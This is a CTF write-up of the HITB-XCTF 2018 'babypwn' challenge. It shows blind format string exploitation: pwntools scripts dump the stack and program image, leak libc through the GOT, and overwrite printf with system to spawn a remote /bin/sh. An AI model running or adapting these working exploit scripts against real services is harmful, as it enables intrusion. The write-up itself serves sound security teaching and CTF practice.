HITB-XCTF GSEC 2018 Quals: babypwn - Blind Format String Exploitation
By David Buchanan, 13th of April 2018
The only information provided with this challenge was an IP address and port number. No binaries to download! Of course, my first idea was to use netcat to see what it did.
```
$ nc 47.75.182.113 9999
hello
hello
%08x
00000000
```
Typing `hello` just resulted in the same input being echoed back. There's only a limited number of possibilities for this kind of challenge, so I thought I'd check if format strings did anything. I entered `%08x`, and sure enough the server responded with `00000000`, demonstrating that the server was passing user input to `printf` or a similar function.
Next, I performed some recon. I wrote a simple script to dump the contents of the stack.
```python
from pwn import *

chal = remote("47.75.182.113", 9999)

# Print stack arguments 1..511 as zero-padded 64-bit hex values
for i in range(1, 512):
    chal.sendline("%{}$016lx".format(i))
    print(chal.recvn(16))
```
Here's a shortened version of the output from two consecutive runs, side by side, along with some annotations I added:
```
First run:       Second run:
0000000000000000 0000000000000000
0000000000000000 0000000000000000
00007f40930892f0 00007f34706a42f0 <- libc pointer
00007f4093383780 00007f347099e780
00007f40935aa700 00007f3470bc5700
786c363130243625 786c363130243625 <- My format string input
00007fff9e520000 00007ffce58bb700
0000000000000000 0000000000000000
00007fff9e520080 00007ffce58bb720
000000006562b026 000000006562b026
00007f4093149627 00007f3470764627
00000000ffffffff 00000000ffffffff
00007f40935ae718 00007f3470bc9718
00007fff9e595280 00007ffce591a280
00007f40935ae700 00007f3470bc9700
00007fff9e520001 00007ffce58bb701
000108882879431a 0001094ab0b7ba64
0000000000000000 0000000000000000
0000000000000000 0000000000000000
0000000000000000 0000000000000000
0000000000000000 0000000000000000
0000000000000000 0000000000000000
0000000000000000 0000000000000000
00007fff9e520258 00007ffce58bb8f8
0000000000000000 0000000000000000
0000000000000001 0000000000000001
00007fff9e520258 00007ffce58bb8f8
0000000000000001 0000000000000001
00007fff9e520180 00007ffce58bb820
00007f40935ae168 00007f3470bc9168
0000000000f0b5ff 0000000000f0b5ff
0000000000000001 0000000000000001
000000000040076d 000000000040076d <- A return address that points into
00007fff9e52015e 00007ffce58bb7fe    the .text segment of the program
0000000000000000 0000000000000000    (presumably)
0000000000400720 0000000000400720
00000000004005a0 00000000004005a0
```
From this we can gather that the program is likely dynamically linked with libc, ASLR is on (the libc addresses are different each time), but PIE is off (the `.text` segment addresses are the same each time). The binary is most likely mapped at `0x400000`, the default base address for non-PIE x86-64 executables.
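As a quick sanity check on the annotated dump, the value at position 6 can be decoded back into text. This is a small sketch using only the standard library (Python 3); it assumes the stack values are little-endian 64-bit words, as they are on x86-64.

```python
import struct

# Sixth value from the stack dump above, as printed by %6$016lx
value = 0x786c363130243625

# x86-64 is little-endian, so pack the word with its lowest byte first
decoded = struct.pack("<Q", value)

print(decoded)  # b'%6$016lx'
```

The decoded bytes are exactly the format string that was sent for that position, which suggests the input buffer begins at argument 6.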
With this information in mind, I wrote a script to dump the program code:
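```python
from pwn import *

# Note: written for Python 2, where str and bytes can be mixed freely
chal = remote("47.75.182.113", 9999)

base = 0x400000
leaked = ""

try:
    while True:
        addr = p64(base + len(leaked))
        if "\n" in addr:
            # This address can't be sent, so record a placeholder byte and move on
            leaked += "\0"
            print("derp")
            continue
        # 16 bytes of format string precede the address, so it lands in argument 8
        chal.sendline("A"*6 + "%8$s" + "B"*6 + addr)
        chal.recvuntil("A"*6)
        leak = chal.recvuntil("B"*6)[:-6]
        # %s stops at the first NUL byte, so the next byte in memory must be NUL
        leaked += leak + "\0"
        print(leak)
finally:
    # Save whatever was dumped, even if the loop is interrupted
    with open("leak.bin", "wb") as l:
        l.write(leaked)
```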
Part of the script skips any addresses containing "\n", otherwise my dump would fail, because the server appeared to be using it to delimit lines of input. I left this program running for a couple of minutes, and dumped the first ~2 KB of the program image.
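The argument index in the leak payload follows from the stack layout: the input buffer starts at argument 6, and each argument slot is 8 bytes, so an address placed 16 bytes into the buffer is argument 8. The sketch below rebuilds the same payload offline with the standard library instead of pwntools (Python 3); the function name `build_leak_payload` and the constants are made up for illustration.

```python
import struct

BUFFER_ARG = 6  # argument index where the input buffer starts (from the stack dump)
WORD = 8        # bytes per printf argument slot on x86-64
FMT_LEN = 16    # the format string part is padded to exactly two slots


def build_leak_payload(addr):
    """Return a payload that prints the string at addr, or None if addr can't be sent."""
    packed = struct.pack("<Q", addr)
    if b"\n" in packed:
        return None  # a newline would end the server's line of input early
    arg = BUFFER_ARG + FMT_LEN // WORD  # 6 + 2 = 8
    fmt = b"A" * 6 + b"%" + str(arg).encode() + b"$s" + b"B" * 6
    assert len(fmt) == FMT_LEN
    return fmt + packed


print(build_leak_payload(0x400000))
print(build_leak_payload(0x40000a))  # None
```

The `A` and `B` runs do double duty: they pad the format string to a slot boundary and act as markers around the leaked bytes in the response.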
I loaded this dump up in IDA and took a look.
Although the symbol table was part of the data I dumped, it wasn't enough for IDA to import automatically, so I had to name things myself.
The program sits in a loop, reading input onto the stack and printf'ing it. Although `gets()` smashes the stack, the loop never returns, so the overwritten return address is never used and the overflow isn't exploitable on its own.
I decided that the easiest path to exploitation was to replace `printf` in the GOT with a pointer to `system`, effectively converting the program into a `system(gets())` loop. But first, I needed to find the address of `printf`'s GOT entry, which is easy because we can just look at the PLT in IDA.
Next, we need to work out where `system` is. To do this, I used format strings to leak the GOT entries for a few different function calls (see my final exploit code below), and then fed the information into https://libc.blukat.me/ (a very useful tool!). This revealed that the libc version being used by the server was `libc6_2.23-0ubuntu10_amd64.so`.
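Lookups of this kind rely on the fact that ASLR shifts libc by whole pages, so the low 12 bits of any libc address stay the same between runs. As an illustration (not part of the original exploit), the libc pointer from the two runs of the stack dump earlier can be compared directly; the helper name `page_offset` is made up for this sketch.

```python
PAGE_MASK = 0xFFF  # ASLR moves the base in 4 KiB pages, leaving the low 12 bits alone


def page_offset(addr):
    """Return the part of an address that ASLR does not change."""
    return addr & PAGE_MASK


# The same libc pointer as seen in the first and second run of the stack dump
first_run = 0x00007f40930892f0
second_run = 0x00007f34706a42f0

print(hex(page_offset(first_run)), hex(page_offset(second_run)))  # 0x2f0 0x2f0
```

A few such offsets for known functions are usually enough to narrow the candidates down to a single libc build.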
Then all I had to do was write a quick format string generator, and there you have it:
```python
from pwn import *

libc = ELF("libc6_2.23-0ubuntu10_amd64.so")

# derived from leaked .text section
got_setbuf = 0x601018
got_printf = 0x601020
got_gets   = 0x601028
got_usleep = 0x601030

chal = remote("47.75.182.113", 9999)

def leak_addr(addr):
    print("Leaking...")
    # "%8$s" plus 12 NUL bytes is 16 bytes, so the address lands in argument 8
    chal.sendline("%8$s" + "\0"*12 + p64(addr))
    # userspace pointers have 6 significant bytes; pad to 8 for u64
    return u64(chal.recvn(6) + "\0\0")

libc_setbuf = leak_addr(got_setbuf)
libc_gets = leak_addr(got_gets)
libc_usleep = leak_addr(got_usleep)

log.info("libc_setbuf = " + hex(libc_setbuf))
log.info("libc_gets   = " + hex(libc_gets))
log.info("libc_usleep = " + hex(libc_usleep))

# calculate libc base address (ASLR)
libc.address = libc_setbuf - libc.sym["setbuf"]
log.info("libc base   = " + hex(libc.address))

# double check we have the correct libc version
assert(libc.sym["gets"] == libc_gets)
assert(libc.sym["usleep"] == libc_usleep)

# now we will overwrite got_printf with libc.sym["system"]

nwritten = 0
payload = ""
addrs = ""
offset = 16  # number of 8-byte slots reserved for the format string
for index, byte in enumerate(bytearray(p64(libc.sym["system"])[:6])):
    addrs += p64(got_printf+index)
    # pad by at least 16 characters so the field width controls the output length
    num_needed = ((byte - nwritten - 16) & 0xFF) + 16
    payload += "%1${}x%{}$hhn".format(num_needed, 6+offset+index)
    nwritten += num_needed

assert(len(payload) <= offset*8)
payload += "\0"*((offset*8)-len(payload))
payload += addrs

assert("\n" not in payload)

chal.sendline(payload)
chal.sendline("/bin/sh")

chal.interactive()
```
Although pwntools does have its own format string generator, I couldn't get it to work ¯\_(ツ)_/¯.
The flag was HITB{Baby_Pwn_BabY_bl1nd}
Finally, I dumped the program binary, so now you can run it offline: babypwn
A quick note on how the format string exploit works:
According to `man 3 printf`, the `%n` formatter means "The number of characters written so far is stored into the integer pointed to by the corresponding argument." We can abuse this by putting arbitrary pointers on the stack, printing a controlled number of bytes, and then using a `%n` to get an arbitrary write.
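The byte-at-a-time variant used in the exploit (`%hhn`, which stores only the low byte of the count) can be checked offline. The sketch below (Python 3, standard library only) recomputes the padding counts the same way the exploit's loop does and simulates what each `%hhn` would store. The name `pad_counts` and the example address are made up for illustration; the address is not the real location of `system`.

```python
import struct


def pad_counts(value, nbytes=6, min_pad=16):
    """Return how many characters to print before each %hhn write."""
    counts = []
    written = 0
    for byte in struct.pack("<Q", value)[:nbytes]:
        # Advance the running total to `byte` modulo 256, printing at least min_pad chars
        count = ((byte - written - min_pad) & 0xFF) + min_pad
        counts.append(count)
        written += count
    return counts


value = 0x7f4093045390  # hypothetical target value, for illustration only

# Simulate printf: each %hhn stores the low byte of the characters written so far
total = 0
stored = []
for count in pad_counts(value):
    total += count
    stored.append(total & 0xFF)

print(bytes(stored) == struct.pack("<Q", value)[:6])  # True
```

Because the running count only ever increases, each step pads by the difference to the next byte modulo 256 rather than resetting, which is why the exploit tracks `nwritten` across iterations.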
If you want a more detailed explanation, google it :P